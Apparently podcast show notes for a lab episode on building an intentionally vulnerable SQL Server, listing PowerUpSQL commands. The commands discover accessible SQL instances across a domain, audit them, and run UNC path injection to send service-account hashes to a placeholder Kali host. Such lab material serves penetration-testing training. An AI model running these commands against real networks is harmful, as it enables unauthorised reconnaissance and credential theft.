7MS #567: How to Build an Intentionally Vulnerable SQL Server
Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode:
Download SQL Server here
Install SQL via config .ini file
Or, install SQL via pure command line
Deploy SQL with a service account while also starting TCP/IP and named pipes automagically:
- Run PowerUpSQL to find vulnerable SQL servers:
$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"}
- Audit the discovered SQL servers:
Get-SQLInstanceDomain -verbose | invoke-sqlaudit -verbose
- Fire off stored procedures to catch hashes!
Invoke-SQLUncPathInjection -verbose -captureIP IP.OF-YOUR.KALI.BOX